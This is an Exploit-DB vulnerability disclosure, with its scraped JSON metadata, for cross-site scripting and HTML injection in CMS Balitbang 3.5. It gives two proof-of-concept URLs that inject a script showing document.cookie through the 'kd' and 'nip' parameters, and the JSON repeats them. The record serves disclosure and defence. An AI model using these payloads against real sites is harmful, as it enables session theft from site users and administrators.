CMS Balitbang Multiple HTML Injection and Cross Site Scripting Vulnerabilities
2012-06-19T00:00:00
ID EDB-ID:37430 Type exploitdb Reporter TheCyberNuxbie Modified 2012-06-19T00:00:00
Description
CMS Balitbang Multiple HTML Injection and Cross Site Scripting Vulnerabilities. Webapps exploit for php platform
source: http://www.securityfocus.com/bid/54084/info
CMS Balitbang is prone to HTML-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
CMS Balitbang 3.5 is vulnerable; other versions may also be affected.
http://www.example.com/balitbang/member/user.php?id=guruabsendetail&kd=<script>alert(document.cookie);</script> [XSS]
http://www.example.com/balitbang/admin/admin.php?mode=mengajar_detail&nip=<script>alert(document.cookie);</script> [XSS]
{"id": "EDB-ID:37430", "hash": "7b5c71774432806d3fe4e55b428c7b03", "type": "exploitdb", "bulletinFamily": "exploit", "title": "CMS Balitbang Multiple HTML Injection and Cross Site Scripting Vulnerabilities", "description": "CMS Balitbang Multiple HTML Injection and Cross Site Scripting Vulnerabilities. Webapps exploit for php platform", "published": "2012-06-19T00:00:00", "modified": "2012-06-19T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/37430/", "reporter": "TheCyberNuxbie", "references": [], "cvelist": [], "lastseen": "2016-02-04T05:48:53", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2016-02-04T05:48:53"}, "dependencies": {"references": [], "modified": "2016-02-04T05:48:53"}, "vulnersScore": 0.1}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/37430/", "sourceData": "source: http://www.securityfocus.com/bid/54084/info\r\n\r\nCMS Balitbang is prone to HTML-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.\r\n\r\nSuccessful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.\r\n\r\nCMS Balitbang 3.5 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/balitbang/member/user.php?id=guruabsendetail&kd=<script>alert(document.cookie);</script> [XSS]\r\n\r\nhttp://www.example.com/balitbang/admin/admin.php?mode=mengajar_detail&nip=<script>alert(document.cookie);</script> [XSS] ", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}